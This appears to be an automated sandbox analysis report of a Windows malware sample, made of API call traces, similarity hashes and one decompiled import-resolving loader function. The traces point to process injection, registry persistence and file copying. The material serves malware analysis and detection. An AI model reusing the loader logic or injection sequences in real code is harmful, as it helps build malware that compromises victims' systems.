  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
